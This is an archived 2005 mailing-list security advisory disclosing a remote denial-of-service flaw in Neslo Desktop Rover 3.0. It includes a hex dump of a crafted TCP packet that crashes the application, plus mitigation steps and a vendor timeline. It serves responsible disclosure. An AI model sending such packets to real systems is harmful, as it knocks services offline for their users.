lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Tue, 19 Apr 2005 21:15:40 -0600
From: Adam Baldwin <evilpacket@...il.com>
To: full-disclosure@...ts.netsys.com, bugtraq@...urityfocus.com
Subject: Neslo Desktop Rover Remote DoS Vulnerability


* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
Title: Neslo Desktop Rover Remote DoS Vulnerability
Vendor Homepage: http://www.nelsosoftware.com

Discovered by: Adam Baldwin (evilpacket@...nuity-is.com)
www.evilpacket.net\advisories\EP-000-0003.html

April 19, 2005


I. INTRODUCTION
Desktop Rover is a software application for Microsoft Windows that
provides the features of a hardware KVM (Keyboard, Video, Mouse).

II. DETAILS
Desktop Rover version 3.0 (and possibly earlier versions) is
vulnerable to a denial of service (DoS). A remote attacker could send
a specially crafted packet to trigger an invalid memory access to
crash the application, resulting in a denial of service.

By default the Desktop Rover listens on port 61427/TCP, it also
conveniently opens up this port in the XP personal firewall.

This packet is an example packet that will cause a denial of service,
there are more variations, but this will suffice for example.

20:23:48.778009 192.168.28.133.32771 > 192.168.28.129.61427: P [tcp sum ok] 
1:13(12) ack 1 win 5840 (DF) (ttl 64, id 24051, len 64)

     4500 0040 5df3 4000 4006 226e c0a8 1c85
     c0a8 1c81 8003 eff3 90a8 d150 7cda 8afa
     8018 16d0 daab 0000 0101 080a 0000 8cbe
     0000 0000 6352 0100 0000 0000 0000 0000


Validated Platforms:
 Windows 2000 Advancded Server [Build 2195, SP4, All Windows Updates]


III. MITIGATING STRATEGY
 The vendor is releasing a fix in version 3.1 soon which will address the 
 vulnerability, until then restricting access to the Desktop Rover ports will 
 reduce the risk of this vulnerability being exploited.

IV. VENDOR COMMUNICATION
 4.14.2005 - Initial vendor contact by e-mail
 4.15.2005 - Initial vendor response
           - Vendor addressed vulnerability
           - Fix confirmed by EvilPacket Security Research
 4.19.2005 - Advisory released

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ